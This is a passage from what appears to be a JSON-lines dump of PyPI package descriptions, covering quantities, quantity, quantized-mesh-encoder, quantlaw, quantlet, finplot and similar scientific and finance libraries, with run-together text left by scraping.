2015/17/D/ST6/04054 (Formal linguistics for proteomics - modeling, analysis and hypotheses testing).LicenseThe Quantiprot package is distributed underthe MIT license.CitingIf you publish results obtained using Quantiprot, please cite:B.M. Konopka, M. Marciniak, and W. Dyrka. Quantiprot \u2013 a Python package for quantitative analysis of protein sequences. BMC Bioinformatics 18:339, 2017CodeCurrently, the code is hosted byE-SCIENCE.PL.DocumentationMore information on the package andexamplescan be found in theUSER MANUAL.ContactPlease contactwitolddotdyrkaatpwrdotedudotpl."} +{"package": "quantipy3", "pacakge-description": "No description available on PyPI."} +{"package": "quantitative", "pacakge-description": "No description available on PyPI."} +{"package": "quantitative-vale-model", "pacakge-description": "quantitative_vale_modelThis package consists in a Simple and profitable quantitative model to user in Brazilian VALE3 (VALE S.A.) StocksInstallpipinstallquantitative-vale-modelImportimportquantitative_vale_modelCall the principal functionsquantitative_vale_model.backtest('%Y-%m-%d')quantitative_vale_model.trade_action()"} +{"package": "quantities", "pacakge-description": "Quantities is designed to handle arithmetic and\nconversions of physical quantities, which have a magnitude, dimensionality\nspecified by various units, and possibly an uncertainty. See thetutorialfor examples. 
Quantities builds on the popular numpy library and is\ndesigned to work with numpy ufuncs, many of which are already\nsupported. Quantities is actively developed, and while the current features\nand API are stable, test coverage is incomplete so the package is not\nsuggested for mission-critical applications.A Python package for handling physical quantities. The source code and issue\ntracker are hosted on GitHub:https://www.github.com/python-quantities/python-quantitiesDownloadGet the latest version of quantities fromhttps://pypi.python.org/pypi/quantities/To get the Git version do:$ git clone git://github.com/python-quantities/python-quantities.gitDocumentation and usageYou can find the official documentation at:http://python-quantities.readthedocs.io/Here is a simple example:>>>importquantitiesaspq>>>distance=42*pq.metre>>>time=17*pq.second>>>velocity=distance/time>>>\"%.3f%s\"%(velocity.magnitude,velocity.dimensionality)'2.471 m/s'>>>velocity+3Traceback(mostrecentcalllast):...ValueError:Unabletoconvertbetweenunitsof\"dimensionless\"and\"m/s\"Installationquantities has a hard dependency on theNumPylibrary.\nYou should install it first, please refer to the NumPy installation guide:http://docs.scipy.org/doc/numpy/user/install.htmlTo install quantities itself, then simply run:$ pip install quantitiesTestsTo execute all tests, install pytest:$ python -m pip install pytestAnd run:$ pytestin the current directory. The master branch is automatically tested by\nGitHub Actions.Authorquantities was originally written by Darren Dale, and has received contributions frommany people.LicenseQuantities only uses BSD compatible code. See the Open Source\nInitiativelicenses pagefor details on individual licenses.Seedoc/user/license.rstfor further details on the license of quantities"} +{"package": "quantities-scidash", "pacakge-description": "Quantities is designed to handle arithmetic andconversions of physical quantities, which have a magnitude, dimensionality\nspecified by various units, and possibly an uncertainty. See thetutorialfor examples. Quantities builds on the popular numpy library and is\ndesigned to work with numpy ufuncs, many of which are already\nsupported. Quantities is actively developed, and while the current features\nand API are stable, test coverage is incomplete so the package is not\nsuggested for mission-critical applications."} +{"package": "quantitizer", "pacakge-description": "No description available on PyPI."} +{"package": "quantit-snapshot", "pacakge-description": "No description available on PyPI."} +{"package": "quantity", "pacakge-description": "The packagequantityprovides classes for unit-safe computations with\nquantities, including money.Defining a quantity classAbasictype of quantity is declared just by sub-classingQuantity:>>> class Length(Quantity):\n... pass\n...But, as long as there is no unit defined for that class, you can not create\nany instance for the new quantity class:>>> l = Length(1)\nTraceback (most recent call last):\nValueError: A unit must be given.If there is a reference unit, the simplest way to define it is giving a name\nand a symbol for it as keywords. The meta-class ofQuantitywill\nthen create a unit automatically:>>> class Mass(Quantity,\n... ref_unit_name='Kilogram',\n... ref_unit_symbol='kg'):\n... pass\n...\n>>> Mass.ref_unit\nUnit('kg')\n>>> class Length(Quantity,\n... ref_unit_name='Metre',\n... ref_unit_symbol='m'):\n... 
pass\n...\n>>> Length.ref_unit\nUnit('m')Now, this unit can be given to create a quantity:>>> METRE = Length.ref_unit\n>>> print(Length(15, METRE))\n15 mIf no unit is given, the reference unit is used:>>> print(Length(15))\n15 mOther units can be derived from the reference unit (or another unit), giving\na definition by multiplying a scaling factor with that unit:>>> a_thousandth = Decimal(\"0.001\")\n>>> KILOGRAM = Mass.ref_unit\n>>> GRAM = Mass.new_unit('g', 'Gram', a_thousandth * KILOGRAM)\n>>> MILLIMETRE = Length.new_unit('mm', 'Millimetre', a_thousandth * METRE)\n>>> MILLIMETRE\nUnit('mm')\n>>> KILOMETRE = Length.new_unit('km', 'Kilometre', 1000 * METRE)\n>>> KILOMETRE\nUnit('km')\n>>> CENTIMETRE = Length.new_unit('cm', 'Centimetre', 10 * MILLIMETRE)\n>>> CENTIMETRE\nUnit('cm')Instead of a number a SI prefix can be used as scaling factor. SI prefixes are\nprovided in a sub-module:>>> from quantity.si_prefixes import *\n>>> NANO.abbr, NANO.name, NANO.factor\n('n', 'Nano', Decimal('0.000000001'))\n\n>>> NANOMETRE = Length.new_unit('nm', 'Nanometre', NANO * METRE)\n>>> NANOMETRE\nUnit('nm')Using one unit as a reference and defining all other units by giving a\nscaling factor is only possible if the units have the same scale. Otherwise,\nunits can just be instantiated without giving a definition:>>> class Temperature(Quantity):\n... pass\n...\n>>> CELSIUS = Temperature.new_unit('\u00b0C', 'Degree Celsius')\n>>> FAHRENHEIT = Temperature.new_unit('\u00b0F', 'Degree Fahrenheit')\n>>> KELVIN = Temperature.new_unit('K', 'Kelvin')Derivedtypes of quantities are declared by giving a definition based on\nmore basic types of quantities:>>> class Volume(Quantity,\n... define_as=Length ** 3,\n... ref_unit_name='Cubic Metre'):\n... pass\n...\n>>> class Duration(Quantity,\n... ref_unit_name='Second',\n... ref_unit_symbol='s'):\n... pass\n...\n>>> class Velocity(Quantity,\n... define_as=Length / Duration,\n... ref_unit_name='Metre per Second'):\n... pass\n...If no symbol for the reference unit is given with the class declaration, a\nsymbol is generated from the definition, as long as all types of quantities\nin that definition have a reference unit.>>> Volume.ref_unit.symbol\n'm\u00b3'\n>>> Velocity.ref_unit.symbol\n'm/s'Other units have to be defined explicitly. This can be done either as shown\nabove or by deriving them from units of the base quantities:>>> CUBIC_CENTIMETRE = Volume.derive_unit_from(CENTIMETRE,\n... name='Cubic Centimetre')\n>>> CUBIC_CENTIMETRE\nUnit('cm\u00b3')\n>>> HOUR = Duration.new_unit('h', 'Hour', 3600 * Duration.ref_unit)\n>>> KILOMETRE_PER_HOUR = Velocity.derive_unit_from(KILOMETRE, HOUR)\n>>> KILOMETRE_PER_HOUR\nUnit('km/h')Instantiating quantitiesThe simplest way to create an instance of a classQuantitysubclass is to\ncall the class giving an amount and a unit. 
If the unit is omitted, the\nquantity's reference unit is used (if one is defined):>>> Length(15, MILLIMETRE)\nLength(Decimal(15), Unit('mm'))Alternatively, an amount and a unit can be multiplied:>>> 17.5 * KILOMETRE\nLength(Decimal('17.5'), Unit('km'))Also, it's possible to create aQuantitysub-class instance from a string\nrepresentation:>>> Length('17.5 km')\nLength(Decimal('17.5'), Unit('km'))Unit-safe computationsA quantity can be converted to a quantity using a different unit by calling\nthe methodQuantity.convert:>>> l5cm = Length(Decimal(5), CENTIMETRE)\n>>> l5cm.convert(MILLIMETRE)\nLength(Decimal(50), Unit('mm'))\n>>> l5cm.convert(KILOMETRE)\nLength(Decimal('0.00005'), Unit('km'))Quantities can be compared to other quantities using all comparison operators\ndefined for numbers. Different units are taken into account automatically, as\nlong as they are compatible, i.e. a conversion is available:>>> Length(27) <= Length(91)\nTrue\n>>> Length(27, METRE) <= Length(91, CENTIMETRE)\nFalseQuantities can be added to or subtracted from other quantities \u2026:>>> Length(27) + Length(9)\nLength(Decimal(36))\n>>> Length(27) - Length(91)\nLength(Decimal(-64))\n>>> Length(27) + Length(12, CENTIMETER)\nLength(Decimal('27.12'))\n>>> Length(12, CENTIMETER) + Length(17, METER)\nLength(Decimal('1712'), Length.Unit('cm'))\u2026 as long as they are instances of the same quantity type:>>> Length(27) + Duration(9)\nTraceback (most recent call last):\nIncompatibleUnitsError: Can't add a 'Length' and a 'Duration'Quantities can be multiplied or divided by scalars, preserving the unit:>>> 7.5 * Length(3, CENTIMETRE)\nLength(Decimal('22.5'), Unit('cm'))\n>>> Duration(66, MINUTE) / 11\nDuration(Decimal(6), Unit('min'))Quantities can be multiplied or divided by other quantities \u2026:>>> Length(15, METRE) / Duration(3, SECOND)\nVelocity(Decimal(5))\u2026 as long as the resulting type of quantity is defined \u2026:>>> Duration(4, SECOND) * Length(7)\nTraceback (most recent call last):\nUndefinedResultError: Undefined result: Duration * Length\u2026 or the result is a scalar:>>> Duration(2, MINUTE) / Duration(50, SECOND)\nDecimal('2.4')MoneyMoneyis a special type of quantity. Its unit type is known as currency.Money differs from physical quantities mainly in two aspects:Money amounts are discrete. For each currency there is a smallest fraction\nthat can not be split further.The relation between different currencies is not fixed, instead, it varies\nover time.The sub-packagequantity.moneyprovides classes and functions to deal\nwith these specifics.A currency must explicitly be registered as a unit for further use. The\neasiest way to do this is to callMoney.register_currency. The method\nis backed by a database of currencies defined in ISO 4217. It takes the\n3-character ISO 4217 code as parameter.Moneyderives fromQuantity, so all operations on quantities can also be\napplied to instances ofMoney. But because there is no fixed relation\nbetween currencies, there is no implicit conversion between money amounts of\ndifferent currencies. Resulting values are always quantized to the smallest\nfraction defined with the currency.A conversion factor between two currencies can be defined by using the\nclassExchangeRate. It is given a unit currency (aka base currency), a unit\nmultiple, a term currency (aka price currency) and a term amount, i.e. 
the\namount in term currency equivalent to unit multiple in unit currency.Multiplying an amount in some currency with an exchange rate with the same\ncurrency as unit currency results in the equivalent amount in term currency.\nLikewise, dividing an amount in some currency with an exchange rate with the\nsame currency as term currency results in the equivalent amount in unit\ncurrency.AsMoneyderives fromQuantity, it can be combined with other quantities\nin order to define a new quantity. This is, for example, useful for defining\nprices per quantum.For more details see the documentation provided with the source distribution\norhere."} +{"package": "quantize", "pacakge-description": "UNKNOWN"} +{"package": "quantized", "pacakge-description": "Transit-ChemDocumentation HomeLibrary for solving the time dependent schroedinger equation,\nand finding the probablilistic confidence of the time it takes for a quantum\nparticle to move from one place to another. Based onthis paper.FeaturesHarmonic Oscillator Basis FunctionsFunctional API for Solving the Time Independent/Time Dependent Schroedinger EquationMolecular manipulations: translation, rotation, etcGuaranteed 90%+ test coverageCLI for 1d transit time analysisCaching and optimizations for overlap and hamiltonian integralsFully type hintedLogging and input validation, with helpful error messagesLicenseLicense"} +{"package": "quantized-mesh-encoder", "pacakge-description": "quantized-mesh-encoderA fast PythonQuantized Meshencoder. Encodes a mesh with\n100k coordinates and 180k triangles in 20ms.Example viewer.The Grand Canyon and Walhalla Plateau. The mesh is created usingpydelatinorpymartini, encoded usingquantized-mesh-encoder, served on-demand usingdem-tiler, and\nrendered withdeck.gl.OverviewQuantized Meshis a format to encode terrain meshes for\nefficient client-side terrain rendering. Such files are supported inCesiumanddeck.gl.This library is designed to support performant server-side on-demand terrain\nmesh generation.InstallWith pip:pip install quantized-mesh-encoderor with Conda:conda install -c conda-forge quantized-mesh-encoderUsingAPIquantized_mesh_encoder.encodeArguments:f: a writable file-like object in which to write encoded bytespositions: (array[float]): either a 1D Numpy array or a 2D Numpy array of\nshape(-1, 3)containing 3D positions.indices(array[int]): either a 1D Numpy array or a 2D Numpy array of shape(-1, 3)indicating triples of coordinates frompositionsto make\ntriangles. For example, if the first three values ofindicesare0,1,2, then that defines a triangle formed by the first 9 values inpositions,\nthree for the first vertex (index0), three for the second vertex, and three\nfor the third vertex.Keyword arguments:bounds(List[float], optional): a list of bounds,[minx, miny, maxx, maxy]. By default, inferred as the minimum and maximum values ofpositions.sphere_method(str, optional): As part of the header information when\nencoding Quantized Mesh, it's necessary to compute abounding\nsphere, which contains all positions of the mesh.sphere_methoddesignates the algorithm to use for creating the bounding\nsphere. Must be one of'bounding_box','naive','ritter'orNone.\nDefault isNone.'bounding_box': Finds the bounding box of all positions, then defines\nthe center of the sphere as the center of the bounding box, and defines\nthe radius as the distance back to the corner. 
This method produces the\nlargest bounding sphere, but is the fastest: roughly 70 \u00b5s on my computer.'naive': Finds the bounding box of all positions, then defines the\ncenter of the sphere as the center of the bounding box. It then checks the\ndistance to every other point and defines the radius as the maximum of\nthese distances. This method will produce a slightly smaller bounding\nsphere than thebounding_boxmethod when points are not in the 3D\ncorners. This is the next fastest at roughly 160 \u00b5s on my computer.'ritter': Implements the Ritter Method for bounding spheres. It first\nfinds the center of the longest span, then checks every point for\ncontainment, enlarging the sphere if necessary. Thiscanproduce smaller\nbounding spheres than the naive method, but it does not always, so often\nboth are run, see next option. This is the slowest method, at roughly 300\n\u00b5s on my computer.None: Runs both the naive and the ritter methods, then returns the\nsmaller of the two. Since this runs both algorithms, it takes around 500\n\u00b5s on my computerellipsoid(quantized_mesh_encoder.Ellipsoid, optional): ellipsoid defined by its semi-majoraand semi-minorbaxes.\nDefault: WGS84 ellipsoid.extensions: list of extensions to encode in quantized mesh object. These must beExtensioninstances. SeeQuantized Mesh Extensions.quantized_mesh_encoder.EllipsoidEllipsoid used for mesh calculations.Arguments:a(float): semi-major axisb(float): semi-minor axisquantized_mesh_encoder.WGS84DefaultWGS84 ellipsoid. Has a semi-major axisaof 6378137.0 meters and semi-minor axisbof 6356752.3142451793 meters.Quantized Mesh ExtensionsThere are a variety ofextensionsto the Quantized Mesh spec.quantized_mesh_encoder.VertexNormalsExtensionImplements theTerrain Lightingextension. Per-vertex normals will be generated from your mesh data.Keyword Arguments:indices: mesh indicespositions: mesh positionsellipsoid: instance of Ellipsoid class, default: WGS84 ellipsoidquantized_mesh_encoder.WaterMaskExtensionImplements theWater Maskextension.Keyword Arguments:data(Union[np.ndarray, np.uint8, int]): Data for water mask.quantized_mesh_encoder.MetadataExtensionImplements theMetadataextension.data(Union[Dict, bytes]): Metadata data to encode. If a dictionary,json.dumpswill be called to create bytes in UTF-8 encoding.ExamplesWrite to filefromquantized_mesh_encoderimportencodewithopen('output.terrain','wb')asf:encode(f,positions,indices)Quantized mesh files are usually saved gzipped. An easy way to create a gzipped\nfile is to usegzip.open:importgzipfromquantized_mesh_encoderimportencodewithgzip.open('output.terrain','wb')asf:encode(f,positions,indices)Write to bufferIt's also pretty simple to write to an in-memory buffer instead of a filefromioimportBytesIOfromquantized_mesh_encoderimportencodewithBytesIO()asbio:encode(bio,positions,indices)Or to gzip the in-memory buffer:importgzipfromioimportBytesIOwithBytesIO()asbio:withgzip.open(bio,'wb')asgzipf:encode(gzipf,positions,indices)Alternate EllipsoidBy default, theWGS84\nellipsoidis\nused for all calculations. 
An alternate ellipsoid may be useful for non-Earth\nplanetary bodies.fromquantized_mesh_encoderimportencode,Ellipsoid# From https://ui.adsabs.harvard.edu/abs/2010EM%26P..106....1A/abstractmars_ellipsoid=Ellipsoid(3_395_428,3_377_678)withopen('output.terrain','wb')asf:encode(f,positions,indices,ellipsoid=mars_ellipsoid)Quantized Mesh Extensionsfromquantized_mesh_encoderimportencode,VertexNormalsExtension,MetadataExtensionvertex_normals=VertexNormalsExtension(positions=positions,indices=indices)metadata=MetadataExtension(data={'hello':'world'})withopen('output.terrain','wb')asf:encode(f,positions,indices,extensions=(vertex_normals,metadata))Generating the meshTo encode a mesh into a quantized mesh file, you first need a mesh! This project\nwas designed to be used withpydelatinorpymartini, fast elevation heightmap to terrain mesh generators.importquantized_mesh_encoderfromimageioimportimreadfrompymartiniimportdecode_ele,Martini,rescale_positionsimportmercantilepng=imread(png_path)terrain=decode_ele(png,'terrarium')terrain=terrain.Tmartini=Martini(png.shape[0]+1)tile=martini.create_tile(terrain)vertices,triangles=tile.get_mesh(10)# Use mercantile to find the bounds in WGS84 of this tilebounds=mercantile.bounds(mercantile.Tile(x,y,z))# Rescale positions to WGS84rescaled=rescale_positions(vertices,terrain,bounds=bounds,flip_y=True)withBytesIO()asf:quantized_mesh_encoder.encode(f,rescaled,triangles)f.seek(0)return(\"OK\",\"application/vnd.quantized-mesh\",f.read())You can also look at the source of_mesh()indem-tilerfor a working reference.LicenseMuch of this code is ported or derived fromquantized-mesh-tilein some way.quantized-mesh-tileis also released under the MIT license."} +{"package": "quantized-mesh-tile", "pacakge-description": "No description available on PyPI."} +{"package": "quantize-fasttext", "pacakge-description": "fasttext\u6a21\u578b\u91cf\u5316\u5de5\u5177"} +{"package": "quantizeml", "pacakge-description": "QuantizeMLFramework for quantizing Deep-learning models.This supports the quantization using low-bitwidth weights and outputs of both CNN\nand Transformer models."} +{"package": "quantizer", "pacakge-description": "No description available on PyPI."} +{"package": "quantizer-pytorch", "pacakge-description": "No description available on PyPI."} +{"package": "quantizetk", "pacakge-description": "QuantizeTKQuantizeTK is a Python library that provides a set of utilities for model optimization and quantization. It simplifies the process of loading optimized and quantized models using OnnxRuntime, along with pre-trained base models. 
The library is built on top oftransformersandoptimum.InstallationpipinstallquantizetkFeaturesLoad optimized, quantized, or base pipelinesSupports models in the OnnxRuntime ecosystemComprehensive logging and validation utilitiesConfigurable optimization and quantization settingsQuick StartInitialize a New Pipelinefromquantizetkimportinit_pipelinepipeline=init_pipeline(model_id=\"your_model_id\")Load an Existing Pipelinefromquantizetk.pipeline.loadimportload_pipelinepipeline=load_pipeline()Directory Structurequantizetk/\n\u2502\n\u251c\u2500\u2500 pipeline/\n\u2502 \u251c\u2500\u2500 create.py\n\u2502 \u251c\u2500\u2500 load.py\n\u2502 \u2514\u2500\u2500 __init__.py\n\u2502\n\u251c\u2500\u2500 shared/\n\u2502 \u251c\u2500\u2500 constants.py\n\u2502 \u251c\u2500\u2500 utils/\n\u2502 \u2502 \u251c\u2500\u2500 validate.py\n\u2502 \u2502 \u2514\u2500\u2500 math_util.py\n\u2502 \u2514\u2500\u2500 __init__.py\n\u2502\n\u2514\u2500\u2500 __init__.pyAPI Overviewpipeline.createcreate_pipeline(...)pipeline.loadload_pipeline(save_dir, file_name)shared.utilsvalidatevalidate_pipeline(pipeline, pipeline_type, contents)math_utilnormalize(obj, p, dim)mean_pooling(model_output, attention_mask)shared.constantsConfiguration and path constantsContributingPlease readCONTRIBUTING.mdfor details on our code of conduct, and the process for submitting pull requests to us.LicenseThis project is licensed under the MIT License - see theLICENSE.mdfile for details."} +{"package": "quantkit", "pacakge-description": "quantkitVery WIP! Finance functions.Installationpipinstallgit+https://github.com/mmngreco/quantkitDevelopersgitclonehttps://github.com/mmngreco/quantkit\npipinstall-e./quantkit"} +{"package": "quantkits", "pacakge-description": "This is a collection of quantitative tools for data science and algo-trading.[Update] 2021-01-29:\nAdded quantapi to provide HK companies\u2019 financial data."} +{"package": "quantlab", "pacakge-description": "This is an alpha preview of QuantLab. It is not ready for general usage yet.\nDevelopment happens onhttps://github.com/quantlabio/quantlab"} +{"package": "quantlab-launcher", "pacakge-description": "This package is used to launch an application built using QuantLab"} +{"package": "quantlaw", "pacakge-description": "quantlawThis package contains coding utilities for quantitative legal studies.ModulesThe package currently consists of two modules.de_extractquantlaw.de_extractis an extractor for references to statutes in German legal texts.\nDifferent to most other Named-entity recognition packages this module does not only\nidentifies the references but also extracts its content. This can e.g. be used to\nquantitativly analyze the structure of the law.For example can the content of two references in the following text be extracted.Source text:\"In den F\u00e4llen des\u00a7 111d Absatz 1 Satz 2derStrafprozessordnungfindet\u00a7 91derInsolvenzordnungkeine Anwendung.\"The extracted data would be:[[['\u00a7', '111d'], ['Abs', '1'], ['Satz', '2']]]for the lawStPO[[['\u00a7', '91']]]for the lawInsOGetting started in the documentation contains a minimal example.utilsquantlaw.utilscontains several utilities that are helpful to analyze the structure of\nthe law withBeautifulSoupandnetworkx. The documentation contains furhter\ninformation about the individual usages.InstallationPython 3.7 is recommended. 
Our package is provided viapip install quantlaw.Further repositoriesIt is, inter alia, used to produce the results reported in the following publication:Daniel Martin Katz, Corinna Coupette, Janis Beckedorf, and Dirk Hartung, Complex Societies and the Growth of the Law,Sci. Rep.10(2020),https://doi.org/10.1038/s41598-020-73623-xRelated Repositories:Complex Societies and the Growth of the Law(First Publication Release)Legal Data Clustering(First Publication Release)Related Data:Preprocessed Input Data forSci. Rep.10(2020)CollaborationPlease format the code usingisort,black, andflake8. An convenient option to\nensure correct formatting of the code is topip install pre-commitand runpre-commit installto add code checking and reformatting as git pre-commit hook."} +{"package": "quantlet", "pacakge-description": "QuantLETQuantLET- an event driven framework for large scale real-time analytics.Copyright (C) 2006 Jorge M. Faleiro Jr.QuantLET is an open source, event-driven framework for rapid development and deployment of real-time analytical\nmodels intended to be executing in large scale, in terms of data intensiveness or computing power (your spreadsheet can't do that).You can see afew examples of the frameworkoutlining the use of signals in a moving average cross-over strategy or how to define and use 'infinite spreadsheets'.There is also a large number of examples produced during my doctorate research and sprinkled across many articles. TheBlack Magic paperdescribes an end-to-end investigation of the use of data to detect profit opportunities in equities using price momentum. The financial languageSIGMAalso part of the same research borrowed some ideas from QuantLET, and vice-versa.The nature of any quantitative framework require a number of quite heavy auxiliary libraries and resources. QuantLET is no exception. You can pick and choose a specific extensions (as python extras) based on what you intend to do with the framework.DevelopmentIf you intend to try out the source code please make yourself aware of thelicense. It is recommended the use of containers and cloud services. At the time of this writing I usedVSCodeandRemote Containers. You will also needpoetryandpre-commit.gitclonegit@gitlab.com:jfaleiro/quantlet.gitcdquantlet\npoetryinstallAll code check and quality procedures are done as part ofpre-commit. These checks are mandatory and are a condition for automatic build and release.poetryshell\npre-commitinstallGit pre commit hooks are installed and from this point on all checks are done locally as a condition for agit committo succeed. CI-CD is done bygitlab. You can find the spec for each component in the source tree.UseTypicalsetuptoolsuse throughpip. You can use the bare bones version:pipinstallquantletOr any of the extensions (extras). If you need one single extension, saystrats:pipinstallquantlet[strats]If you want multiple extensions, like reactives and deep learning for example, you add each extension separated by comma:pipinstallquantlet[reactives,dl]You don't want to use the wildcardquantlet[*]and install all extras. Python is not really an environment geared toward large scale software development and this will bring in all depenedencies, across all extensions. Inpipandpoetryfor example this might lead to a few hours of dependency resolution alone. There are way more uses and features in QuantLET than we would like to admit and you can possibly need for one application, so be parcimonious.Each extension is defined in a project namedquantlet-[extension]. 
Dependencies on QuantLET'spyproject.tomlare defined like this:\"quantlet.reactives\"={git=\"https://gitlab.com/jfaleiro/quantlet-reactives.git\",rev=\"release/0.0.1\",develop=true,optional=true}This type of dependency is resolved throughgit. In each case you might need read access to the specificgitlabrepository. Feel free to investigate and get in touch if you need access or details.quantlet-streamsQuantLET elements of stream processing (filtering, grouping, selection, functional operations) on canonical and data frames format.[1,3,4,7,8]>>apply(lambdax:dict(x=x)))==[{'x':1},{'x':3},{'x':4},{'x':7},{'x':8}]This is thestreaming facetdefined as part of the financial languageSIGMA.quantlet-reactivesFast and simple framework for reactive programming. A declarative paradigm that allows the definition of what has to be done through reactive relationships, letting the computational representation automatically take care of when to do it, and which results are produced, similar to cells in an electronic spreadsheet representing values and a formula.v=[R(i)for_inrange(10000)]c=sum(*v)foriinv:i.v=normal()print(c.v)>>0.0035This is thereactives facetdefined as part of the financial languageSIGMA.quantlet-big-reactivesSupport for reactive use cases that must reply on very large data: infinite reactive graphs (infinite spreadsheets) associated to non-structured repositories. Reactives are organized in distributed nodes, allowing for automatic persistence and in memory allocation beyond the limits of one single computer.quantlet-timeseriesFast timeseries functions and transformations. Large store and retrievals of sequencial datasets infastparquetthroughtsstore.quantlet-agentsSynchronous and asynchronous agents for discrete-event simulation. This is related to thedistributionandsimulation facetsdefined as part of the financial languageSIGMA.quantlet-stratsFinancial strategies and analytics. Elements of numeric processing, data analysis, plotting and tabular transformations. Basically strats are classified in bands,BandsDefine higher a lower limits around an ongoing signal, e.g., for Bollinger and fixed bands:# Bollinger bandsa=(simple_dataframe>>std(price_tag='price')>>bollinger(ma_tag='price'))assertround(a.upper.mean(),2)==1.94assertround(a.lower.mean(),2)==-2.02# Fixed bandsa=(simple_dataframe>>fixed(ma_tag='price'))assertround(a.upper.mean(),2)==-0.05assertround(a.lower.mean(),2)==-0.03FiltersDerive a new sequence based on a original signal, e.g.# RMA, recursive moving averageassertlist(map(lambdax:dict(y=x),[1.0,2.0,3.0,4.0,5.0,6.0])>>rma(m=3))==[{'y':1.0,'rma':1.0},{'y':2.0,'rma':1.5},{'y':3.0,'rma':2.0},{'y':4.0,'rma':3.0},{'y':5.0,'rma':4.0},{'y':6.0,'rma':5.0}]# EWMA, exponentially weighted moving averageassertlist(list(map(lambdax:dict(y=x),[1.0,2.0,3.0,4.0,5.0,6.0]))>>ewma(input_tag='y'))==[{'y':1.0,'ewma':1.0},{'y':2.0,'ewma':1.1},{'y':3.0,'ewma':1.29},{'y':4.0,'ewma':1.561},{'y':5.0,'ewma':1.9049},{'y':6.0,'ewma':2.31441}]Financial engineeringCommon financial calculation QLets.Returns and cash flow streams: Absolute, single and multiple periods. Continous and discrete compounding.Options: Binomial lattice, single and multiple period binomial reactive option pricing. Black scholes model. Put-call parity pricing. Greeks.Hedging: Delta hedging. Stop price hedging.SeedingGenerators of financial sequences.Timeseries seedingRandom walk and brownian motions. 
Random uniform seedingStatsStatistical transformations.Uniform distributionAutocorrelation metricsInflection pointsquantlet-mlOperations related to machine learning transformations: feature engineering, interpolations, incremental and batch learning. Thisarticleis an example of [nowcasting][https://en.wikipedia.org/wiki/Nowcasting_(economics)] of trading signals using arobot traderusing incremental learning inquantlet-ml:(retrieve('XXXX',start='2013-01-01',end='2017-12-31')[['Adj.Close','Adj.Volume']]>>apply(adjust_columns)>>scale(['adj_price','adj_volume'],scalers=[price_scaler,volume_scaler])>>one_hot([\"dow\",\"dom\",\"month\"])>>window_shift(['adj_price','adj_volume'],5,separator='-')>>online_fit_predict(model,'predicted_adj_price',error_type='squared',response_variable_tag='adj_price',ignore_tags=['Date'])>>ewma('error',alpha=.2,output_tag='ewme')>>unscale(['adj_price','predicted_adj_price','adj_price-1','adj_price-2','adj_price-3','adj_price-4','adj_price-5'],scalers=[price_scaler]*7,index_column='Date'))It usesQLetsfor basic operations of window shifting, scaling, one-hot encoding, and online fit and predict in one step for streams.quantlet-dlExtension ofquantlet-mlto support deep-learning libraries and algorithms. CurrentlyKerasandTensorFlow.quantlet-scratchpadSupport for interactive use and visualization of resources inJupyternotebooks.Final NotesQuantLET is an open source project that I put together andhave been using for a very long timeto test ideas, hold discussions with fellow practitioners, and extend mydoctorate research in scientific crowdsand thetheory of enablers. The doctorate thesis was finished many years ago, in 2018, and isavailable onlineif you are curious and want to learn more about the subject.Bear in mind that the materialization of QuantLET was a result of volunteering my time in one of my many passions: investigations in technology, engineering, humans, and incentives that make humans do what they do. Nevertheless, unless I feel a compeling reason for a change, QuantLET is basically unsupported.This program is distributed in the hope that it will be useful, butWITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITYorFITNESS FOR A PARTICULAR PURPOSE. See theGNU Affero General Public Licensefor more details. The license file is also shipped as part of the source code.Last, but not least, it is important to note that QuantLET was the entry point to a number of successful commercial frameworks, such asPlatformandHydra. If you have an idea on how to leverage these frameworks, or extend QuantLET, the power of large scale computing, AI, and crowds, feel free to get in touch."} +{"package": "quantlet.agents", "pacakge-description": "quantlet-agentsSynchronous and asynchronous agents for discrete-event simulation. This is related to thedistributionandsimulation facetsdefined as part of the financial languageSIGMA."} +{"package": "quantlet.core", "pacakge-description": "QuantLET-coreQuantLET-core - core components in QuantLETUtility functionsIn memory atomicity (rollback, commit)Graph structures"} +{"package": "quantlet.ml", "pacakge-description": "quantlet-mlOperations related to machine learning transformations: feature engineering, interpolations, incremental and batch learning."} +{"package": "quantlet.reactives", "pacakge-description": "quantlet-reactivesReactive programming framework for large scale real-time analytics. 
This is related to thereactive facetdefined as part of the financial languageSIGMA."} +{"package": "quantlet.strats", "pacakge-description": "QuantLET-stratsQuantLET-strats - QuantLET strategies, statistics, curves, filters, and financial engineering functions"} +{"package": "quantlet.streaming", "pacakge-description": "QuantLET-streamingQuantLET-streaming - Elements of stream processing in the QuantLET frameworkElements of stream processing, numeric computations, data analysis, plotting and tabular transformations (filtering, aggregations, time series, data frames, etc) in the QuantLET framework."} +{"package": "quantlet.timeseries", "pacakge-description": "QuantLET-timeseriesQuantLET-timeseries - Fast timeseries functions and transformations in QuantLETLarge store and retrievals of sequential datasets infastparquetthroughtsstore."} +{"package": "quantlplot", "pacakge-description": "Finance PlotFinance Plotter, or finplot, is a performant library with a clean api to help you with your backtesting. It's\nopinionated with good defaults, so you can start doing your work without having to setup plots, colors, scales,\nautoscaling, keybindings, handle panning+vertical zooming (which all non-finance libraries have problems with).\nAnd best of all: it can show hundreds of thousands of datapoints without batting an eye.FeaturesGreat performance compared to mpl_finance, plotly and BokehClean apiWorks with both stocks as well as cryptocurrencies on any time resolutionShow as many charts as you want on the same time axis, zoom on all of them at onceAuto-reload position where you were looking last runOverlays, fill between, value bands, symbols, labels, legend, volume profile, heatmaps, etc.Can show real-time updates, including orderbook. Save screenshot.Comes with adozengreat examples.What it is notfinplot is not a web app. It does not help you create a homebrew exchange. It does not work with Jupyter Labs.It is only intended for you to do backtesting in. That is not to say that you can't create a ticker or a trade\nwidget yourself. The library is based on the eminent pyqtgraph, which is fast and flexible, so feel free to hack\naway if that's what you want.Easy installation$pipinstallfinplotExampleIt's straight-forward to start using. 
